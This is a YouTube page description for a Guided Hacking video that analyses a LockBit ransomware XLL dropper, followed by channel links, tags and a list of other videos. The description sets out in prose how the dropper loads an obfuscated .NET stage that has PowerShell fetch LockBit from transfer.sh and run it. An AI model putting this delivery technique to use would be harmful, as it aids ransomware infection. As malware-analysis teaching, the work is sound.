LockBit Ransomware - XLL Document Malware Analysis

Channel:
United States Guided Hacking
Subscribers:
178,000
Published on ● Video Link: https://www.youtube.com/watch?v=cNP6QXXUxro


Duration: 8:42
3,984 views
0

LockBit is spreading their Ransomware via an XLL document which executes a dropper.
Support us on GH: https://guidedhacking.com/register/
Support us on Patreon:   / guidedhacking  
Support us on YT:    / @guidedhacking  

In the video we said that pestudio uploads files to VirusTotal, this is not true. It just searches for the hash. Sorry for the confusion.

LockBit Malware Analysis - XLL Document Dropper
https://guidedhacking.com/threads/loc...

We'll begin our Lockbit malware analysis by examining the concept of XLL documents. An XLL is a type of DLL used to add functionality to Excel. For our LockBit ransomware investigation, we'll use PEStudio to assess the XLL file. Examining the exports in PEStudio, XLAutoOpen turns up - an indication of maliciousness.

Threat actors using XLL files often store the next stage of malware in the resources. PEStudio flags three resources; the first are EXCELDNA files common to Excel, not necessarily malicious. The second, oddly named and unrelated to Excel resources, may be malicious. Dump and analyze the third resource to determine if malicious.

Using Detect It Easy (DIE) to examine a dumped file reveals a .NET binary that is obfuscated with ConfuserX. To analyze, a modified version of de4dot is required to deobfuscate. Then, DNSpy can be used to start the malware analysis of LockBit ransomware, with obfuscated strings and two ShellExecute calls.

Deciphering the strings reveals a call to powershell.exe, downloading BitStransfer to obtain another binary, which will then be run by PowerShell. The file, LockBit, is acquired from transfer.sh and executed within the same powershell command. Additionally, using DNSpy, an xlsx file from the binary resources can be extracted - this is a decoy for when the victim downloads the file.

Follow us on Facebook : http://bit.ly/2vvHfhk
Follow us on Twitter : http://bit.ly/3bC7J1i
Follow us on Twitch : http://bit.ly/39ywOZ2
Follow us on Reddit : http://bit.ly/3bvOB57
Follow us on GitHub : http://bit.ly/2HoNXIS
Follow us on Instagram : http://bit.ly/2SoDOlu

lockbit virus
malware analysis
lockbit ransomware removal
lockbit ransomware analysis
lockbit ransomware gang
cyber security
xll document
malware
lockbit ransom
lockbit ransomware decrypt
ransomware explained
reverse engineering



Other Videos By Guided Hacking


2023-02-18YouHacker - Analyzing a Python Malware Builder
2023-02-14Solving a ChatGPT Generated RustLang CrackMe
2023-02-10Analyzing RedLine C2 Communications - Malware Analysis
2023-02-04How Threat Actors Infect Each Other - Malware Analysis
2023-01-31How to Hack il2cpp Games - MelonLoader Tutorial
2023-01-25Youtuber with 2 Million Subs Gets Hacked - RedLine Malware Analysis
2023-01-20Hacking Electron Games 2 - Persistent Cheat Menu Overlay
2023-01-18👨‍💻 Exploit Development Part 6 - Writing A ROP Decoder
2023-01-11👨‍💻 How does a crypter work? 👨‍💻 LimeCrypter Malware Analysis 👨‍💻
2023-01-06How to Hack Electron Games - Vampire Survivors Cheats
2023-01-03LockBit Ransomware - XLL Document Malware Analysis
2022-12-29Exploit Development 5 - DEP Bypass with WriteProcessMemory
2022-12-14Reverse Engineering Mallox Ransomware - Malware Analysis
2022-12-06ChatGPT - Malware Analysis using Artificial Intelligence
2022-12-02BlackGuard Malware Analysis - Worst Stealer of 2022
2022-11-29How to Setup CAPEV2 Sandbox - Malware Config & Payload Extractor
2022-11-25Binary Exploit Development 4 - DEP Bypass with VirtualAlloc
2022-11-18CrashedTech Malware Analysis - Reversing a Loader
2022-11-15The GH Unreal Engine Dumper
2022-11-11Where to Download New Malware Samples
2022-11-01Top 5 Best Ida Pro Plugins For Malware Analysis


Tags:
guidedhacking
lockbit ransomware
lockbit virus
malware analysis
lockbit ransomware removal
lockbit ransomware analysis
lockbit ransomware gang
cyber security
xll document
malware
lockbit dropper
lockbit ransom
lockbit ransomware decrypt
ransomware explained
reverse engineering
lockbit ransomware builder